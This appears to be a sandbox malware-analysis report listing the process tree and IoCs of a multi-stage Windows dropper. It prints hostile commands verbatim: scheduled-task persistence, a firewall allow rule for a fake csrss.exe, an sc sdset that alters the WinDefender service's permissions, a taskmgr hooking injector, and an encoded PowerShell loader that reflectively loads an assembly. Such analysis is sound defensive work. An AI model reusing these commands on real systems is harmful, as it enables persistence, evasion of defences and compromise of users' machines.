3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3140 Explorer.EXE
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

668
668
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

5HD6In9.exetoolspub2.exe

pid process

4940 5HD6In9.exe
3736 toolspub2.exe

pid	process
3140	Explorer.EXE

pid	process
668
668

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

2Md4671.exe4lk161Fz.exeFCB0.exeExplorer.EXE1F2.exepowershell.exeFBD5.exe559212.exepowershell.exe31839b57a4f11171d6abc8bbc4451ee4.exeRsopprbwlid.exejsc.exeConhost.exe

description	pid	process
Token: SeSecurityPrivilege	1728	2Md4671.exe
Token: SeSecurityPrivilege	2792	4lk161Fz.exe
Token: SeDebugPrivilege	1304	FCB0.exe
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeDebugPrivilege	1884	1F2.exe
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	1240	FBD5.exe
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeDebugPrivilege	5024	559212.exe
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	4848
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeDebugPrivilege	4600	31839b57a4f11171d6abc8bbc4451ee4.exe
Token: SeImpersonatePrivilege	4600	31839b57a4f11171d6abc8bbc4451ee4.exe
Token: SeDebugPrivilege	820	Rsopprbwlid.exe
Token: SeDebugPrivilege	4904	jsc.exe
Token: SeDebugPrivilege	3928	Conhost.exe
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

1F2.exeAddInProcess.exe

pid process

1300 1F2.exe
1652 AddInProcess.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Broom.exeExplorer.EXE

pid process

436 Broom.exe
3140 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3140 Explorer.EXE

pid	process
1300	1F2.exe
1652	AddInProcess.exe

pid	process
436	Broom.exe
3140	Explorer.EXE

pid	process
3140	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

sample1.exeFb8dm28.exe2Md4671.exe4lk161Fz.exeExplorer.EXE1F2.exe1F2.exepowershell.exe

description	pid	process	target process
PID 3200 wrote to memory of 5056	3200	sample1.exe	Fb8dm28.exe
PID 3200 wrote to memory of 5056	3200	sample1.exe	Fb8dm28.exe
PID 3200 wrote to memory of 5056	3200	sample1.exe	Fb8dm28.exe
PID 5056 wrote to memory of 1728	5056	Fb8dm28.exe	2Md4671.exe
PID 5056 wrote to memory of 1728	5056	Fb8dm28.exe	2Md4671.exe
PID 5056 wrote to memory of 1728	5056	Fb8dm28.exe	2Md4671.exe
PID 1728 wrote to memory of 4520	1728	2Md4671.exe	AppLaunch.exe
PID 1728 wrote to memory of 4520	1728	2Md4671.exe	AppLaunch.exe
PID 1728 wrote to memory of 4520	1728	2Md4671.exe	AppLaunch.exe
PID 1728 wrote to memory of 3004	1728	2Md4671.exe	AppLaunch.exe
PID 1728 wrote to memory of 3004	1728	2Md4671.exe	AppLaunch.exe
PID 1728 wrote to memory of 3004	1728	2Md4671.exe	AppLaunch.exe
PID 1728 wrote to memory of 3004	1728	2Md4671.exe	AppLaunch.exe
PID 1728 wrote to memory of 3004	1728	2Md4671.exe	AppLaunch.exe
PID 1728 wrote to memory of 3004	1728	2Md4671.exe	AppLaunch.exe
PID 1728 wrote to memory of 3004	1728	2Md4671.exe	AppLaunch.exe
PID 1728 wrote to memory of 3004	1728	2Md4671.exe	AppLaunch.exe
PID 5056 wrote to memory of 2792	5056	Fb8dm28.exe	4lk161Fz.exe
PID 5056 wrote to memory of 2792	5056	Fb8dm28.exe	4lk161Fz.exe
PID 5056 wrote to memory of 2792	5056	Fb8dm28.exe	4lk161Fz.exe
PID 2792 wrote to memory of 1284	2792	4lk161Fz.exe	AppLaunch.exe
PID 2792 wrote to memory of 1284	2792	4lk161Fz.exe	AppLaunch.exe
PID 2792 wrote to memory of 1284	2792	4lk161Fz.exe	AppLaunch.exe
PID 2792 wrote to memory of 1284	2792	4lk161Fz.exe	AppLaunch.exe
PID 2792 wrote to memory of 1284	2792	4lk161Fz.exe	AppLaunch.exe
PID 2792 wrote to memory of 1284	2792	4lk161Fz.exe	AppLaunch.exe
PID 2792 wrote to memory of 1284	2792	4lk161Fz.exe	AppLaunch.exe
PID 2792 wrote to memory of 1284	2792	4lk161Fz.exe	AppLaunch.exe
PID 2792 wrote to memory of 1284	2792	4lk161Fz.exe	AppLaunch.exe
PID 2792 wrote to memory of 1284	2792	4lk161Fz.exe	AppLaunch.exe
PID 3200 wrote to memory of 4940	3200	sample1.exe	5HD6In9.exe
PID 3200 wrote to memory of 4940	3200	sample1.exe	5HD6In9.exe
PID 3200 wrote to memory of 4940	3200	sample1.exe	5HD6In9.exe
PID 3140 wrote to memory of 1240	3140	Explorer.EXE	FBD5.exe
PID 3140 wrote to memory of 1240	3140	Explorer.EXE	FBD5.exe
PID 3140 wrote to memory of 1240	3140	Explorer.EXE	FBD5.exe
PID 3140 wrote to memory of 1304	3140	Explorer.EXE	FCB0.exe
PID 3140 wrote to memory of 1304	3140	Explorer.EXE	FCB0.exe
PID 3140 wrote to memory of 1304	3140	Explorer.EXE	FCB0.exe
PID 3140 wrote to memory of 3684	3140	Explorer.EXE	FEC5.exe
PID 3140 wrote to memory of 3684	3140	Explorer.EXE	FEC5.exe
PID 3140 wrote to memory of 3684	3140	Explorer.EXE	FEC5.exe
PID 3140 wrote to memory of 1884	3140	Explorer.EXE	1F2.exe
PID 3140 wrote to memory of 1884	3140	Explorer.EXE	1F2.exe
PID 3140 wrote to memory of 1884	3140	Explorer.EXE	1F2.exe
PID 1884 wrote to memory of 1300	1884	1F2.exe	1F2.exe
PID 1884 wrote to memory of 1300	1884	1F2.exe	1F2.exe
PID 1884 wrote to memory of 1300	1884	1F2.exe	1F2.exe
PID 1884 wrote to memory of 1300	1884	1F2.exe	1F2.exe
PID 1884 wrote to memory of 1300	1884	1F2.exe	1F2.exe
PID 1884 wrote to memory of 1300	1884	1F2.exe	1F2.exe
PID 1884 wrote to memory of 1300	1884	1F2.exe	1F2.exe
PID 1884 wrote to memory of 1300	1884	1F2.exe	1F2.exe
PID 1884 wrote to memory of 1300	1884	1F2.exe	1F2.exe
PID 1884 wrote to memory of 1300	1884	1F2.exe	1F2.exe
PID 1300 wrote to memory of 3928	1300	1F2.exe	Utsysc.exe
PID 1300 wrote to memory of 3928	1300	1F2.exe	Utsysc.exe
PID 1300 wrote to memory of 3928	1300	1F2.exe	Utsysc.exe
PID 3928 wrote to memory of 3736	3928	powershell.exe	toolspub2.exe
PID 3928 wrote to memory of 3736	3928	powershell.exe	toolspub2.exe
PID 3928 wrote to memory of 3736	3928	powershell.exe	toolspub2.exe
PID 3928 wrote to memory of 2612	3928	powershell.exe	Utsysc.exe
PID 3928 wrote to memory of 2612	3928	powershell.exe	Utsysc.exe
PID 3928 wrote to memory of 2612	3928	powershell.exe	Utsysc.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3140

C:\Users\Admin\AppData\Local\Temp\sample1.exe
"C:\Users\Admin\AppData\Local\Temp\sample1.exe"
2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3200

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Fb8dm28.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Fb8dm28.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5056

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2Md4671.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2Md4671.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
PID:4520

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
PID:3004

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4lk161Fz.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4lk161Fz.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
PID:1284

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5HD6In9.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5HD6In9.exe
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4940

C:\Users\Admin\AppData\Local\Temp\FBD5.exe
C:\Users\Admin\AppData\Local\Temp\FBD5.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\Users\Admin\AppData\Local\Temp\FCB0.exe
C:\Users\Admin\AppData\Local\Temp\FCB0.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:1304

C:\Users\Admin\AppData\Local\559212.exe
"C:\Users\Admin\AppData\Local\559212.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Users\Admin\AppData\Local\Temp\FEC5.exe
C:\Users\Admin\AppData\Local\Temp\FEC5.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 784
3⤵
- Program crash
PID:404

C:\Users\Admin\AppData\Local\Temp\1F2.exe
C:\Users\Admin\AppData\Local\Temp\1F2.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1884

C:\Users\Admin\AppData\Local\Temp\1F2.exe
C:\Users\Admin\AppData\Local\Temp\1F2.exe
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1300

C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe"
4⤵
- Executes dropped EXE
PID:3928

C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
5⤵
PID:3736

C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
5⤵
- Executes dropped EXE
PID:2612

C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
5⤵
- Checks computer location settings
- Executes dropped EXE
PID:4944

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe" /F
6⤵
- Creates scheduled task(s)
PID:2672

C:\Users\Admin\AppData\Roaming\1000003000\Rsopprbwlid.exe
"C:\Users\Admin\AppData\Roaming\1000003000\Rsopprbwlid.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:820

C:\Users\Admin\AppData\Roaming\1000003000\Rsopprbwlid.exe
C:\Users\Admin\AppData\Roaming\1000003000\Rsopprbwlid.exe
7⤵
PID:4904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000005021\Obemzhjhhdb.cmd" "
6⤵
PID:1308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
7⤵
PID:3304

C:\Windows\SysWOW64\xcopy.exe
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Intyweuri.png
7⤵
- Enumerates system info in registry
PID:1088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\1000005021\Obemzhjhhdb.cmd"
7⤵
PID:2256

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
8⤵
PID:4900

C:\Windows\SysWOW64\xcopy.exe
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Intyweuri.png
8⤵
- Enumerates system info in registry
PID:3988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
8⤵
PID:2672

C:\Windows\SysWOW64\xcopy.exe
xcopy /d /q /y /h /i C:\Users\Admin\AppData\Local\Temp\1000005021\Obemzhjhhdb.cmd C:\Users\Admin\AppData\Local\Temp\Intyweuri.png.bat
8⤵
- Enumerates system info in registry
PID:4180

C:\Users\Admin\AppData\Local\Temp\Intyweuri.png
C:\Users\Admin\AppData\Local\Temp\Intyweuri.png -win 1 -enc JABTAGUAeABqAHcAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQAVgB0AHgAdwB5AHEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUwBlAHgAagB3ACkAOwAkAEwAZABsAG8AeQBtAGYAcwB1AGYAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAVgB0AHgAdwB5AHEAIAApADsAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAQgBzAG8AYgBnAGYAdgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABMAGQAbABvAHkAbQBmAHMAdQBmAGkALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEIAcwBvAGIAZwBmAHYALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAEIAcwBvAGIAZwBmAHYALgBDAGwAbwBzAGUAKAApADsAJABMAGQAbABvAHkAbQBmAHMAdQBmAGkALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABWAHQAeAB3AHkAcQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABWAHQAeAB3AHkAcQApADsAIAAkAFQAZQBvAHIAdwBzAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAVgB0AHgAdwB5AHEAKQA7ACAAJABQAHgAYgBwAHgAYwBhAGcAYgBsAHUAIAA9ACAAJABUAGUAbwByAHcAcwBjAC4ARwBlAHQARQB4AHAAbwByAHQAZQBkAFQAeQBwAGUAcwAoACkAWwAwAF0AOwAgACQATAB3AHAAbQBwAGwAIAA9ACAAJABQAHgAYgBwAHgAYwBhAGcAYgBsAHUALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
8⤵
- Executes dropped EXE
PID:3820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 2108
9⤵
- Program crash
PID:4012

C:\Users\Admin\AppData\Local\Temp\3140.exe
C:\Users\Admin\AppData\Local\Temp\3140.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:4256

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
3⤵
- Executes dropped EXE
PID:2068

C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:436

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2680

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3736

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4600

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2356

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:2388

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:4972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Blocklisted process makes network request
PID:4116

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:1248

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1956

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:2176

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
6⤵
PID:2140

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:552

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
- Executes dropped EXE
PID:2672

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:3532

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4116

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
6⤵
- Executes dropped EXE
PID:3656

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
PID:4548

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
- Executes dropped EXE
- Launches sc.exe
PID:2044

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:644

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
6⤵
- Executes dropped EXE
PID:4348

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn "csrss" /f
7⤵
PID:4404

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn "ScheduledUpdate" /f
7⤵
PID:3412

C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:2928

C:\Users\Admin\AppData\Local\Temp\7446.exe
C:\Users\Admin\AppData\Local\Temp\7446.exe
2⤵
PID:2328

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
3⤵
PID:1096

C:\Users\Admin\AppData\Local\Temp\A559.exe
C:\Users\Admin\AppData\Local\Temp\A559.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3492

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4904

C:\Users\Admin\AppData\Local\Temp\A9FE.exe
C:\Users\Admin\AppData\Local\Temp\A9FE.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4236

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 312
3⤵
- Program crash
PID:3564

C:\Users\Admin\AppData\Local\Temp\ABD3.exe
